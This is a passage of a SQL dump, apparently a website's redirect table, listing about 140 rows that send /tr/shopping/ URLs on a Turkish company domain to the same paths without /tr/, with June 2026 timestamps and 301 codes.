00:00:00',301),(79060,'https://3s-technologies.com.tr/tr/shopping/highball/2662204237.html',NULL,'https://3s-technologies.com.tr/shopping/highball/2662204237.html','',1,0,'2026-06-11 22:11:32','0000-00-00 00:00:00',301),(79061,'https://3s-technologies.com.tr/tr/shopping/mayas/3156085529.html',NULL,'https://3s-technologies.com.tr/shopping/mayas/3156085529.html','',1,0,'2026-06-11 22:11:36','0000-00-00 00:00:00',301),(79062,'https://3s-technologies.com.tr/tr/shopping/vouchee/3882488612.html',NULL,'https://3s-technologies.com.tr/shopping/vouchee/3882488612.html','',1,0,'2026-06-11 22:11:41','0000-00-00 00:00:00',301),(79063,'https://3s-technologies.com.tr/tr/shopping/whewellite/4056286874.html',NULL,'https://3s-technologies.com.tr/shopping/whewellite/4056286874.html','',1,0,'2026-06-11 22:11:44','0000-00-00 00:00:00',301),(79064,'https://3s-technologies.com.tr/tr/shopping/manid/3287280436.html',NULL,'https://3s-technologies.com.tr/shopping/manid/3287280436.html','',1,0,'2026-06-11 22:11:47','0000-00-00 00:00:00',301),(79065,'https://3s-technologies.com.tr/tr/shopping/indesinent/166905183.html',NULL,'https://3s-technologies.com.tr/shopping/indesinent/166905183.html','',1,0,'2026-06-11 22:11:50','0000-00-00 00:00:00',301),(79066,'https://3s-technologies.com.tr/tr/shopping/lowgh/3559246920.html',NULL,'https://3s-technologies.com.tr/shopping/lowgh/3559246920.html','',1,0,'2026-06-11 22:11:53','0000-00-00 00:00:00',301),(79067,'https://3s-technologies.com.tr/tr/shopping/dambonite/1620027545.html',NULL,'https://3s-technologies.com.tr/shopping/dambonite/1620027545.html','',1,0,'2026-06-11 22:11:56','0000-00-00 00:00:00',301),(79068,'https://3s-technologies.com.tr/tr/shopping/evilness/1525361243.html',NULL,'https://3s-technologies.com.tr/shopping/evilness/1525361243.html','',1,0,'2026-06-11 22:11:59','0000-00-00 00:00:00',301),(79069,'https://3s-technologies.com.tr/tr/shopping/microcrystalline/211743143.html',NULL,'https://3s-technologies.com.tr/shopping/microcrystalline/211743143.html','',1,0,'2026-06-11 22:12:02','0000-00-00 00:00:00',301),(79070,'https://3s-technologies.com.tr/tr/shopping/cuneate/3582748219.html',NULL,'https://3s-technologies.com.tr/shopping/cuneate/3582748219.html','',1,0,'2026-06-11 22:12:05','0000-00-00 00:00:00',301),(79071,'https://3s-technologies.com.tr/tr/shopping/fortissimo/1472361886.html',NULL,'https://3s-technologies.com.tr/shopping/fortissimo/1472361886.html','',1,0,'2026-06-11 22:12:08','0000-00-00 00:00:00',301),(79072,'https://3s-technologies.com.tr/tr/shopping/promptly/1931456464.html',NULL,'https://3s-technologies.com.tr/shopping/promptly/1931456464.html','',1,0,'2026-06-11 22:12:11','0000-00-00 00:00:00',301),(79073,'https://3s-technologies.com.tr/tr/shopping/receipt/2110234248.html',NULL,'https://3s-technologies.com.tr/shopping/receipt/2110234248.html','',1,0,'2026-06-11 22:12:14','0000-00-00 00:00:00',301),(79074,'https://3s-technologies.com.tr/tr/shopping/upsidown/795227587.html',NULL,'https://3s-technologies.com.tr/shopping/upsidown/795227587.html','',1,0,'2026-06-11 22:12:17','0000-00-00 00:00:00',301),(79075,'https://3s-technologies.com.tr/tr/shopping/standoffish/452691834.html',NULL,'https://3s-technologies.com.tr/shopping/standoffish/452691834.html','',1,0,'2026-06-11 22:12:20','0000-00-00 00:00:00',301),(79076,'https://3s-technologies.com.tr/tr/shopping/alcalde/3675942228.html',NULL,'https://3s-technologies.com.tr/shopping/alcalde/3675942228.html','',1,0,'2026-06-11 22:12:23','0000-00-00 00:00:00',301),(79077,'https://3s-technologies.com.tr/tr/shopping/vesicular/2426004014.html',NULL,'https://3s-technologies.com.tr/shopping/vesicular/2426004014.html','',1,0,'2026-06-11 22:12:26','0000-00-00 00:00:00',301),(79078,'https://3s-technologies.com.tr/tr/shopping/eradiated/2201179982.html',NULL,'https://3s-technologies.com.tr/shopping/eradiated/2201179982.html','',1,0,'2026-06-11 22:12:29','0000-00-00 00:00:00',301),(79079,'https://3s-technologies.com.tr/tr/shopping/zonate/2088168464.html',NULL,'https://3s-technologies.com.tr/shopping/zonate/2088168464.html','',1,0,'2026-06-11 22:12:32','0000-00-00 00:00:00',301),(79080,'https://3s-technologies.com.tr/tr/shopping/blandly/3877116157.html',NULL,'https://3s-technologies.com.tr/shopping/blandly/3877116157.html','',1,0,'2026-06-11 22:12:36','0000-00-00 00:00:00',301),(79081,'https://3s-technologies.com.tr/tr/shopping/horrid/2949185293.html',NULL,'https://3s-technologies.com.tr/shopping/horrid/2949185293.html','',1,0,'2026-06-11 22:12:38','0000-00-00 00:00:00',301),(79082,'https://3s-technologies.com.tr/tr/shopping/accidentality/4177000061.html',NULL,'https://3s-technologies.com.tr/shopping/accidentality/4177000061.html','',1,0,'2026-06-11 22:12:41','0000-00-00 00:00:00',301),(79083,'https://3s-technologies.com.tr/tr/shopping/motorized/3380772169.html',NULL,'https://3s-technologies.com.tr/shopping/motorized/3380772169.html','',1,0,'2026-06-11 22:12:44','0000-00-00 00:00:00',301),(79084,'https://3s-technologies.com.tr/tr/shopping/rumply/1712013330.html',NULL,'https://3s-technologies.com.tr/shopping/rumply/1712013330.html','',1,0,'2026-06-11 22:12:48','0000-00-00 00:00:00',301),(79085,'https://3s-technologies.com.tr/tr/shopping/sermonet/4052746662.html',NULL,'https://3s-technologies.com.tr/shopping/sermonet/4052746662.html','',1,0,'2026-06-11 22:12:50','0000-00-00 00:00:00',301),(79086,'https://3s-technologies.com.tr/tr/shopping/tigris/188452233.html',NULL,'https://3s-technologies.com.tr/shopping/tigris/188452233.html','',1,0,'2026-06-11 22:12:54','0000-00-00 00:00:00',301),(79087,'https://3s-technologies.com.tr/tr/shopping/overlaying/3027237289.html',NULL,'https://3s-technologies.com.tr/shopping/overlaying/3027237289.html','',1,0,'2026-06-11 22:12:56','0000-00-00 00:00:00',301),(79088,'https://3s-technologies.com.tr/tr/shopping/transudatory/251937811.html',NULL,'https://3s-technologies.com.tr/shopping/transudatory/251937811.html','',1,0,'2026-06-11 22:13:00','0000-00-00 00:00:00',301),(79089,'https://3s-technologies.com.tr/tr/shopping/ecclesiarch/1228026594.html',NULL,'https://3s-technologies.com.tr/shopping/ecclesiarch/1228026594.html','',1,0,'2026-06-11 22:13:02','0000-00-00 00:00:00',301),(79090,'https://3s-technologies.com.tr/tr/shopping/exestuation/3318895509.html',NULL,'https://3s-technologies.com.tr/shopping/exestuation/3318895509.html','',1,0,'2026-06-11 22:13:05','0000-00-00 00:00:00',301),(79091,'https://3s-technologies.com.tr/tr/shopping/nudely/2134369051.html',NULL,'https://3s-technologies.com.tr/shopping/nudely/2134369051.html','',1,0,'2026-06-11 22:13:09','0000-00-00 00:00:00',301),(79092,'https://3s-technologies.com.tr/tr/shopping/padrone/2783905981.html',NULL,'https://3s-technologies.com.tr/shopping/padrone/2783905981.html','',1,0,'2026-06-11 22:13:11','0000-00-00 00:00:00',301),(79093,'https://3s-technologies.com.tr/tr/shopping/orbituary/3040384277.html',NULL,'https://3s-technologies.com.tr/shopping/orbituary/3040384277.html','',1,0,'2026-06-11 22:13:16','0000-00-00 00:00:00',301),(79094,'https://3s-technologies.com.tr/tr/shopping/campestral/398310802.html',NULL,'https://3s-technologies.com.tr/shopping/campestral/398310802.html','',1,0,'2026-06-11 22:13:21','0000-00-00 00:00:00',301),(79095,'https://3s-technologies.com.tr/tr/shopping/scutch/3948599577.html',NULL,'https://3s-technologies.com.tr/shopping/scutch/3948599577.html','',1,0,'2026-06-11 22:13:24','0000-00-00 00:00:00',301),(79096,'https://3s-technologies.com.tr/tr/shopping/mimic/2856758097.html',NULL,'https://3s-technologies.com.tr/shopping/mimic/2856758097.html','',1,0,'2026-06-11 22:13:26','0000-00-00 00:00:00',301),(79097,'https://3s-technologies.com.tr/tr/shopping/boned/2903147429.html',NULL,'https://3s-technologies.com.tr/shopping/boned/2903147429.html','',1,0,'2026-06-11 22:13:30','0000-00-00 00:00:00',301),(79098,'https://3s-technologies.com.tr/tr/shopping/supraspinal/288794213.html',NULL,'https://3s-technologies.com.tr/shopping/supraspinal/288794213.html','',1,0,'2026-06-11 22:13:33','0000-00-00 00:00:00',301),(79099,'https://3s-technologies.com.tr/tr/shopping/cognition/2806182922.html',NULL,'https://3s-technologies.com.tr/shopping/cognition/2806182922.html','',1,0,'2026-06-11 22:13:35','0000-00-00 00:00:00',301),(79100,'https://3s-technologies.com.tr/tr/shopping/wrestled/3668759666.html',NULL,'https://3s-technologies.com.tr/shopping/wrestled/3668759666.html','',1,0,'2026-06-11 22:13:39','0000-00-00 00:00:00',301),(79101,'https://3s-technologies.com.tr/tr/shopping/budget/4085535368.html',NULL,'https://3s-technologies.com.tr/shopping/budget/4085535368.html','',1,0,'2026-06-11 22:13:41','0000-00-00 00:00:00',301),(79102,'https://3s-technologies.com.tr/tr/shopping/dysenteric/2812575748.html',NULL,'https://3s-technologies.com.tr/shopping/dysenteric/2812575748.html','',1,0,'2026-06-11 22:13:44','0000-00-00 00:00:00',301),(79103,'https://3s-technologies.com.tr/tr/shopping/conquassation/921490580.html',NULL,'https://3s-technologies.com.tr/shopping/conquassation/921490580.html','',1,0,'2026-06-11 22:13:50','0000-00-00 00:00:00',301),(79104,'https://3s-technologies.com.tr/tr/shopping/anthophyllitic/2765591478.html',NULL,'https://3s-technologies.com.tr/shopping/anthophyllitic/2765591478.html','',1,0,'2026-06-11 22:13:53','0000-00-00 00:00:00',301),(79105,'https://3s-technologies.com.tr/tr/shopping/lecherer/1238594388.html',NULL,'https://3s-technologies.com.tr/shopping/lecherer/1238594388.html','',1,0,'2026-06-11 22:13:56','0000-00-00 00:00:00',301),(79106,'https://3s-technologies.com.tr/tr/shopping/demonstrator/4102928888.html',NULL,'https://3s-technologies.com.tr/shopping/demonstrator/4102928888.html','',1,0,'2026-06-11 22:13:59','0000-00-00 00:00:00',301),(79107,'https://3s-technologies.com.tr/tr/shopping/acierage/3935616128.html',NULL,'https://3s-technologies.com.tr/shopping/acierage/3935616128.html','',1,0,'2026-06-11 22:14:02','0000-00-00 00:00:00',301),(79108,'https://3s-technologies.com.tr/tr/shopping/catallacta/4084203669.html',NULL,'https://3s-technologies.com.tr/shopping/catallacta/4084203669.html','',1,0,'2026-06-11 22:14:05','0000-00-00 00:00:00',301),(79109,'https://3s-technologies.com.tr/tr/shopping/diocese/4128372277.html',NULL,'https://3s-technologies.com.tr/shopping/diocese/4128372277.html','',1,0,'2026-06-11 22:14:08','0000-00-00 00:00:00',301),(79110,'https://3s-technologies.com.tr/tr/shopping/mormondom/125513769.html',NULL,'https://3s-technologies.com.tr/shopping/mormondom/125513769.html','',1,0,'2026-06-11 22:14:11','0000-00-00 00:00:00',301),(79111,'https://3s-technologies.com.tr/tr/shopping/precoracoid/3325262896.html',NULL,'https://3s-technologies.com.tr/shopping/precoracoid/3325262896.html','',1,0,'2026-06-11 22:14:14','0000-00-00 00:00:00',301),(79112,'https://3s-technologies.com.tr/tr/shopping/brachinus/1051285242.html',NULL,'https://3s-technologies.com.tr/shopping/brachinus/1051285242.html','',1,0,'2026-06-11 22:14:17','0000-00-00 00:00:00',301),(79113,'https://3s-technologies.com.tr/tr/shopping/crossspale/2757980484.html',NULL,'https://3s-technologies.com.tr/shopping/crossspale/2757980484.html','',1,0,'2026-06-11 22:14:20','0000-00-00 00:00:00',301),(79114,'https://3s-technologies.com.tr/tr/shopping/boutade/2220491611.html',NULL,'https://3s-technologies.com.tr/shopping/boutade/2220491611.html','',1,0,'2026-06-11 22:14:23','0000-00-00 00:00:00',301),(79115,'https://3s-technologies.com.tr/tr/shopping/metapophyses/388969687.html',NULL,'https://3s-technologies.com.tr/shopping/metapophyses/388969687.html','',1,0,'2026-06-11 22:14:26','0000-00-00 00:00:00',301),(79116,'https://3s-technologies.com.tr/tr/shopping/mercifully/3726521246.html',NULL,'https://3s-technologies.com.tr/shopping/mercifully/3726521246.html','',1,0,'2026-06-11 22:14:29','0000-00-00 00:00:00',301),(79117,'https://3s-technologies.com.tr/tr/shopping/jocund/773735914.html',NULL,'https://3s-technologies.com.tr/shopping/jocund/773735914.html','',1,0,'2026-06-11 22:14:32','0000-00-00 00:00:00',301),(79118,'https://3s-technologies.com.tr/tr/shopping/bimestrial/274435126.html',NULL,'https://3s-technologies.com.tr/shopping/bimestrial/274435126.html','',1,0,'2026-06-11 22:14:35','0000-00-00 00:00:00',301),(79119,'https://3s-technologies.com.tr/tr/shopping/calumniously/48243171.html',NULL,'https://3s-technologies.com.tr/shopping/calumniously/48243171.html','',1,0,'2026-06-11 22:14:38','0000-00-00 00:00:00',301),(79120,'https://3s-technologies.com.tr/tr/shopping/cynoidea/2807171637.html',NULL,'https://3s-technologies.com.tr/shopping/cynoidea/2807171637.html','',1,0,'2026-06-11 22:14:41','0000-00-00 00:00:00',301),(79121,'https://3s-technologies.com.tr/tr/shopping/emolument/1471409379.html',NULL,'https://3s-technologies.com.tr/shopping/emolument/1471409379.html','',1,0,'2026-06-11 22:14:44','0000-00-00 00:00:00',301),(79122,'https://3s-technologies.com.tr/tr/shopping/assentiveness/3865964935.html',NULL,'https://3s-technologies.com.tr/shopping/assentiveness/3865964935.html','',1,0,'2026-06-11 22:14:47','0000-00-00 00:00:00',301),(79123,'https://3s-technologies.com.tr/tr/shopping/selenious/152769464.html',NULL,'https://3s-technologies.com.tr/shopping/selenious/152769464.html','',1,0,'2026-06-11 22:14:52','0000-00-00 00:00:00',301),(79124,'https://3s-technologies.com.tr/tr/shopping/diatom/2197639754.html',NULL,'https://3s-technologies.com.tr/shopping/diatom/2197639754.html','',1,0,'2026-06-11 22:14:56','0000-00-00 00:00:00',301),(79125,'https://3s-technologies.com.tr/tr/shopping/preamble/2535166088.html',NULL,'https://3s-technologies.com.tr/shopping/preamble/2535166088.html','',1,0,'2026-06-11 22:14:59','0000-00-00 00:00:00',301),(79126,'https://3s-technologies.com.tr/tr/shopping/chokebored/1105027587.html',NULL,'https://3s-technologies.com.tr/shopping/chokebored/1105027587.html','',1,0,'2026-06-11 22:15:02','0000-00-00 00:00:00',301),(79127,'https://3s-technologies.com.tr/tr/shopping/carcinogenic/796439686.html',NULL,'https://3s-technologies.com.tr/shopping/carcinogenic/796439686.html','',1,0,'2026-06-11 22:15:05','0000-00-00 00:00:00',301),(79128,'https://3s-technologies.com.tr/tr/shopping/chymosin/548468113.html',NULL,'https://3s-technologies.com.tr/shopping/chymosin/548468113.html','',1,0,'2026-06-11 22:15:08','0000-00-00 00:00:00',301),(79129,'https://3s-technologies.com.tr/tr/shopping/mossed/4179164651.html',NULL,'https://3s-technologies.com.tr/shopping/mossed/4179164651.html','',1,0,'2026-06-11 22:15:11','0000-00-00 00:00:00',301),(79130,'https://3s-technologies.com.tr/tr/shopping/disappropriate/2096297448.html',NULL,'https://3s-technologies.com.tr/shopping/disappropriate/2096297448.html','',1,0,'2026-06-11 22:15:14','0000-00-00 00:00:00',301),(79131,'https://3s-technologies.com.tr/tr/shopping/sonchus/4099948991.html',NULL,'https://3s-technologies.com.tr/shopping/sonchus/4099948991.html','',1,0,'2026-06-11 22:15:17','0000-00-00 00:00:00',301),(79132,'https://3s-technologies.com.tr/tr/shopping/sabaeanism/489524414.html',NULL,'https://3s-technologies.com.tr/shopping/sabaeanism/489524414.html','',1,0,'2026-06-11 22:15:20','0000-00-00 00:00:00',301),(79133,'https://3s-technologies.com.tr/tr/shopping/setaceous/3727336553.html',NULL,'https://3s-technologies.com.tr/shopping/setaceous/3727336553.html','',1,0,'2026-06-11 22:15:23','0000-00-00 00:00:00',301),(79134,'https://3s-technologies.com.tr/tr/shopping/textuarist/3024855384.html',NULL,'https://3s-technologies.com.tr/shopping/textuarist/3024855384.html','',1,0,'2026-06-11 22:15:26','0000-00-00 00:00:00',301),(79135,'https://3s-technologies.com.tr/tr/shopping/pigsney/1355499212.html',NULL,'https://3s-technologies.com.tr/shopping/pigsney/1355499212.html','',1,0,'2026-06-11 22:15:29','0000-00-00 00:00:00',301),(79136,'https://3s-technologies.com.tr/tr/shopping/indistinctive/3341002874.html',NULL,'https://3s-technologies.com.tr/shopping/indistinctive/3341002874.html','',1,0,'2026-06-11 22:15:32','0000-00-00 00:00:00',301),(79137,'https://3s-technologies.com.tr/tr/shopping/lysiloma/653437331.html',NULL,'https://3s-technologies.com.tr/shopping/lysiloma/653437331.html','',1,0,'2026-06-11 22:15:35','0000-00-00 00:00:00',301),(79138,'https://3s-technologies.com.tr/tr/shopping/weder/292179445.html',NULL,'https://3s-technologies.com.tr/shopping/weder/292179445.html','',1,0,'2026-06-11 22:15:38','0000-00-00 00:00:00',301),(79139,'https://3s-technologies.com.tr/tr/shopping/saddler/2246580599.html',NULL,'https://3s-technologies.com.tr/shopping/saddler/2246580599.html','',1,0,'2026-06-11 22:15:44','0000-00-00 00:00:00',301),(79140,'https://3s-technologies.com.tr/tr/shopping/vernacular/2686889997.html',NULL,'https://3s-technologies.com.tr/shopping/vernacular/2686889997.html','',1,0,'2026-06-11 22:15:47','0000-00-00 00:00:00',301),(79141,'https://3s-technologies.com.tr/tr/shopping/precariously/2546467589.html',NULL,'https://3s-technologies.com.tr/shopping/precariously/2546467589.html','',1,0,'2026-06-11 22:15:50','0000-00-00 00:00:00',301),(79142,'https://3s-technologies.com.tr/tr/shopping/dendrological/3953780320.html',NULL,'https://3s-technologies.com.tr/shopping/dendrological/3953780320.html','',1,0,'2026-06-11 22:15:53','0000-00-00 00:00:00',301),(79143,'https://3s-technologies.com.tr/tr/shopping/depressed/2907381734.html',NULL,'https://3s-technologies.com.tr/shopping/depressed/2907381734.html','',1,0,'2026-06-11 22:15:56','0000-00-00 00:00:00',301),(79144,'https://3s-technologies.com.tr/tr/shopping/breathing/1411441660.html',NULL,'https://3s-technologies.com.tr/shopping/breathing/1411441660.html','',1,0,'2026-06-11 22:15:59','0000-00-00 00:00:00',301),(79145,'https://3s-technologies.com.tr/tr/shopping/jesuit/3342963292.html',NULL,'https://3s-technologies.com.tr/shopping/jesuit/3342963292.html','',1,0,'2026-06-11 22:16:02','0000-00-00 00:00:00',301),(79146,'https://3s-technologies.com.tr/tr/shopping/ductilely/1391406209.html',NULL,'https://3s-technologies.com.tr/shopping/ductilely/1391406209.html','',1,0,'2026-06-11 22:16:05','0000-00-00 00:00:00',301),(79147,'https://3s-technologies.com.tr/tr/shopping/doloroso/668189470.html',NULL,'https://3s-technologies.com.tr/shopping/doloroso/668189470.html','',1,0,'2026-06-11 22:16:08','0000-00-00 00:00:00',301),(79148,'https://3s-technologies.com.tr/tr/shopping/louvered/2289190281.html',NULL,'https://3s-technologies.com.tr/shopping/louvered/2289190281.html','',1,0,'2026-06-11 22:16:11','0000-00-00 00:00:00',301),(79149,'https://3s-technologies.com.tr/tr/shopping/phaenogam/2265745776.html',NULL,'https://3s-technologies.com.tr/shopping/phaenogam/2265745776.html','',1,0,'2026-06-11 22:16:14','0000-00-00 00:00:00',301),(79150,'https://3s-technologies.com.tr/tr/shopping/scenograph/2116204859.html',NULL,'https://3s-technologies.com.tr/shopping/scenograph/2116204859.html','',1,0,'2026-06-11 22:16:17','0000-00-00 00:00:00',301),(79151,'https://3s-technologies.com.tr/tr/shopping/phonotypic/1629377187.html',NULL,'https://3s-technologies.com.tr/shopping/phonotypic/1629377187.html','',1,0,'2026-06-11 22:16:20','0000-00-00 00:00:00',301),(79152,'https://3s-technologies.com.tr/tr/shopping/nonne/3572575843.html',NULL,'https://3s-technologies.com.tr/shopping/nonne/3572575843.html','',1,0,'2026-06-11 22:16:23','0000-00-00 00:00:00',301),(79153,'https://3s-technologies.com.tr/tr/shopping/dryad/3654426818.html',NULL,'https://3s-technologies.com.tr/shopping/dryad/3654426818.html','',1,0,'2026-06-11 22:16:26','0000-00-00 00:00:00',301),(79154,'https://3s-technologies.com.tr/tr/shopping/hungerbit/1099439869.html',NULL,'https://3s-technologies.com.tr/shopping/hungerbit/1099439869.html','',1,0,'2026-06-11 22:16:29','0000-00-00 00:00:00',301),(79155,'https://3s-technologies.com.tr/tr/shopping/articulately/3528779517.html',NULL,'https://3s-technologies.com.tr/shopping/articulately/3528779517.html','',1,0,'2026-06-11 22:16:32','0000-00-00 00:00:00',301),(79156,'https://3s-technologies.com.tr/tr/shopping/mealy/2462863502.html',NULL,'https://3s-technologies.com.tr/shopping/mealy/2462863502.html','',1,0,'2026-06-11 22:16:35','0000-00-00 00:00:00',301),(79157,'https://3s-technologies.com.tr/tr/shopping/infernally/2672367556.html',NULL,'https://3s-technologies.com.tr/shopping/infernally/2672367556.html','',1,0,'2026-06-11 22:16:38','0000-00-00 00:00:00',301),(79158,'https://3s-technologies.com.tr/tr/shopping/reinstallment/2116041320.html',NULL,'https://3s-technologies.com.tr/shopping/reinstallment/2116041320.html','',1,0,'2026-06-11 22:16:41','0000-00-00 00:00:00',301),(79159,'https://3s-technologies.com.tr/tr/shopping/woolgathering/1530337766.html',NULL,'https://3s-technologies.com.tr/shopping/woolgathering/1530337766.html','',1,0,'2026-06-11 22:16:44','0000-00-00 00:00:00',301),(79160,'https://3s-technologies.com.tr/tr/shopping/crusado/2347954476.html',NULL,'https://3s-technologies.com.tr/shopping/crusado/2347954476.html','',1,0,'2026-06-11 22:16:47','0000-00-00 00:00:00',301),(79161,'https://3s-technologies.com.tr/tr/shopping/garreteer/520574456.html',NULL,'https://3s-technologies.com.tr/shopping/garreteer/520574456.html','',1,0,'2026-06-11 22:16:50','0000-00-00 00:00:00',301),(79162,'https://3s-technologies.com.tr/tr/shopping/zaptiah/3409538037.html',NULL,'https://3s-technologies.com.tr/shopping/zaptiah/3409538037.html','',1,0,'2026-06-11 22:16:53','0000-00-00 00:00:00',301),(79163,'https://3s-technologies.com.tr/tr/shopping/ignition/4078618467.html',NULL,'https://3s-technologies.com.tr/shopping/ignition/4078618467.html','',1,0,'2026-06-11 22:16:56','0000-00-00 00:00:00',301),(79164,'https://3s-technologies.com.tr/tr/shopping/oilstone/540543285.html',NULL,'https://3s-technologies.com.tr/shopping/oilstone/540543285.html','',1,0,'2026-06-11 22:17:02','0000-00-00 00:00:00',301),(79165,'https://3s-technologies.com.tr/tr/shopping/alcedo/120709312.html',NULL,'https://3s-technologies.com.tr/shopping/alcedo/120709312.html','',1,0,'2026-06-11 22:17:04','0000-00-00 00:00:00',301),(79166,'https://3s-technologies.com.tr/tr/shopping/peasantry/1411062436.html',NULL,'https://3s-technologies.com.tr/shopping/peasantry/1411062436.html','',1,0,'2026-06-11 22:17:07','0000-00-00 00:00:00',301),(79167,'https://3s-technologies.com.tr/tr/shopping/jabber/3976246022.html',NULL,'https://3s-technologies.com.tr/shopping/jabber/3976246022.html','',1,0,'2026-06-11 22:17:10','0000-00-00 00:00:00',301),(79168,'https://3s-technologies.com.tr/tr/shopping/matronal/801989508.html',NULL,'https://3s-technologies.com.tr/shopping/matronal/801989508.html','',1,0,'2026-06-11 22:17:13','0000-00-00 00:00:00',301),(79169,'https://3s-technologies.com.tr/tr/shopping/featheriness/1325827846.html',NULL,'https://3s-technologies.com.tr/shopping/featheriness/1325827846.html','',1,0,'2026-06-11 22:17:16','0000-00-00 00:00:00',301),(79170,'https://3s-technologies.com.tr/tr/shopping/glyceryl/3127399067.html',NULL,'https://3s-technologies.com.tr/shopping/glyceryl/3127399067.html','',1,0,'2026-06-11 22:17:19','0000-00-00 00:00:00',301),(79171,'https://3s-technologies.com.tr/tr/shopping/glabella/3947815894.html',NULL,'https://3s-technologies.com.tr/shopping/glabella/3947815894.html','',1,0,'2026-06-11 22:17:22','0000-00-00 00:00:00',301),(79172,'https://3s-technologies.com.tr/tr/shopping/flatyrynchus/4199072046.html',NULL,'https://3s-technologies.com.tr/shopping/flatyrynchus/4199072046.html','',1,0,'2026-06-11 22:17:25','0000-00-00 00:00:00',301),(79173,'https://3s-technologies.com.tr/tr/shopping/purge/685281814.html',NULL,'https://3s-technologies.com.tr/shopping/purge/685281814.html','',1,0,'2026-06-11 22:17:28','0000-00-00 00:00:00',301),(79174,'https://3s-technologies.com.tr/tr/shopping/widen/437120648.html',NULL,'https://3s-technologies.com.tr/shopping/widen/437120648.html','',1,0,'2026-06-11 22:17:31','0000-00-00 00:00:00',301),(79175,'https://3s-technologies.com.tr/tr/shopping/accounted/2930701214.html',NULL,'https://3s-technologies.com.tr/shopping/accounted/2930701214.html','',1,0,'2026-06-11 22:17:34','0000-00-00 00:00:00',301),(79176,'https://3s-technologies.com.tr/tr/shopping/piquancy/1580924467.html',NULL,'https://3s-technologies.com.tr/shopping/piquancy/1580924467.html','',1,0,'2026-06-11 22:17:37','0000-00-00 00:00:00',301),(79177,'https://3s-technologies.com.tr/tr/shopping/nebouxii/3911548345.html',NULL,'https://3s-technologies.com.tr/shopping/nebouxii/3911548345.html','',1,0,'2026-06-11 22:17:40','0000-00-00 00:00:00',301),(79178,'https://3s-technologies.com.tr/tr/shopping/whitethorn/3055315149.html',NULL,'https://3s-technologies.com.tr/shopping/whitethorn/3055315149.html','',1,0,'2026-06-11 22:17:43','0000-00-00 00:00:00',301),(79179,'https://3s-technologies.com.tr/tr/shopping/yazoo/1761715663.html',NULL,'https://3s-technologies.com.tr/shopping/yazoo/1761715663.html','',1,0,'2026-06-11 22:17:46','0000-00-00 00:00:00',301),(79180,'https://3s-technologies.com.tr/tr/shopping/lithophane/1801783016.html',NULL,'https://3s-technologies.com.tr/shopping/lithophane/1801783016.html','',1,0,'2026-06-11 22:17:54','0000-00-00 00:00:00',301),(79181,'https://3s-technologies.com.tr/tr/shopping/febricitate/1594036091.html',NULL,'https://3s-technologies.com.tr/shopping/febricitate/1594036091.html','',1,0,'2026-06-11 22:17:59','0000-00-00 00:00:00',301),(79182,'https://3s-technologies.com.tr/tr/shopping/incendiously/3959161318.html',NULL,'https://3s-technologies.com.tr/shopping/incendiously/3959161318.html','',1,0,'2026-06-11 22:18:02','0000-00-00 00:00:00',301),(79183,'https://3s-technologies.com.tr/tr/shopping/telescopy/1423213026.html',NULL,'https://3s-technologies.com.tr/shopping/telescopy/1423213026.html','',1,0,'2026-06-11 22:18:05','0000-00-00 00:00:00',301),(79184,'https://3s-technologies.com.tr/tr/shopping/evaporation/1133071697.html',NULL,'https://3s-technologies.com.tr/shopping/evaporation/1133071697.html','',1,0,'2026-06-11 22:18:08','0000-00-00 00:00:00',301),(79185,'https://3s-technologies.com.tr/tr/shopping/ochre/367850209.html',NULL,'https://3s-technologies.com.tr/shopping/ochre/367850209.html','',1,0,'2026-06-11 22:18:12','0000-00-00 00:00:00',301),(79186,'https://3s-technologies.com.tr/tr/shopping/distractile/3787126154.html',NULL,'https://3s-technologies.com.tr/shopping/distractile/3787126154.html','',1,0,'2026-06-11 22:18:15','0000-00-00 00:00:00',301),(79187,'https://3s-technologies.com.tr/tr/shopping/latinise/4052523294.html',NULL,'https://3s-technologies.com.tr/shopping/latinise/4052523294.html','',1,0,'2026-06-11 22:18:18','0000-00-00 00:00:00',301),(79188,'https://3s-technologies.com.tr/tr/shopping/aunters/3238860699.html',NULL,'https://3s-technologies.com.tr/shopping/aunters/3238860699.html','',1,0,'2026-06-11 22:18:24','0000-00-00 00:00:00',301),(79189,'https://3s-technologies.com.tr/tr/shopping/naiades/2491166331.html',NULL,'https://3s-technologies.com.tr/shopping/naiades/2491166331.html','',1,0,'2026-06-11 22:18:27','0000-00-00 00:00:00',301),(79190,'https://3s-technologies.com.tr/tr/shopping/frisket/4169600152.html',NULL,'https://3s-technologies.com.tr/shopping/frisket/4169600152.html','',1,0,'2026-06-11 22:18:30','0000-00-00 00:00:00',301),(79191,'https://3s-technologies.com.tr/tr/shopping/holosericeus/868128154.html',NULL,'https://3s-technologies.com.tr/shopping/holosericeus/868128154.html','',1,0,'2026-06-11 22:18:33','0000-00-00 00:00:00',301),(79192,'https://3s-technologies.com.tr/tr/shopping/abietin/395928897.html',NULL,'https://3s-technologies.com.tr/shopping/abietin/395928897.html','',1,0,'2026-06-11 22:18:36','0000-00-00 00:00:00',301),(79193,'https://3s-technologies.com.tr/tr/shopping/hydrocephaloid/1120121982.html',NULL,'https://3s-technologies.com.tr/shopping/hydrocephaloid/1120121982.html','',1,0,'2026-06-11 22:18:39','0000-00-00 00:00:00',301),(79194,'https://3s-technologies.com.tr/tr/shopping/cocci/1892764717.html',NULL,'https://3s-technologies.com.tr/shopping/cocci/1892764717.html','',1,0,'2026-06-11 22:18:42','0000-00-00 00:00:00',301),(79195,'https://3s-technologies.com.tr/tr/shopping/lawless/3811398125.html',NULL,'https://3s-technologies.com.tr/shopping/lawless/3811398125.html','',1,0,'2026-06-11 22:18:45','0000-00-00 00:00:00',301),(79196,'https://3s-technologies.com.tr/tr/shopping/elegantly/2094921842.html',NULL,'https://3s-technologies.com.tr/shopping/elegantly/2094921842.html','',1,0,'2026-06-11 22:18:48','0000-00-00 00:00:00',301),(79197,'https://3s-technologies.com.tr/tr/shopping/cinemograph/3652881528.html',NULL,'https://3s-technologies.com.tr/shopping/cinemograph/3652881528.html','',1,0,'2026-06-11 22:18:52','0000-00-00 00:00:00',301),(79198,'https://3s-technologies.com.tr/tr/shopping/fulgora/2607380261.html',NULL,'https://3s-technologies.com.tr/shopping/fulgora/2607380261.html','',1,0,'2026-06-11 22:18:57','0000-00-00 00:00:00',301),(79199,'https://3s-technologies.com.tr/tr/shopping/quadriphyllous/2309314891.html',NULL,'https://3s-technologies.com.tr/shopping/quadriphyllous/2309314891.html','',1,0,'2026-06-11 22:19:00','0000-00-00 00:00:00',301),(79200,'https://3s-technologies.com.tr/tr/shopping/rhamphocinclus/88865382.html',NULL,'https://3s-technologies.com.tr/shopping/rhamphocinclus/88865382.html','',1,0,'2026-06-11 22:19:03','0000-00-00 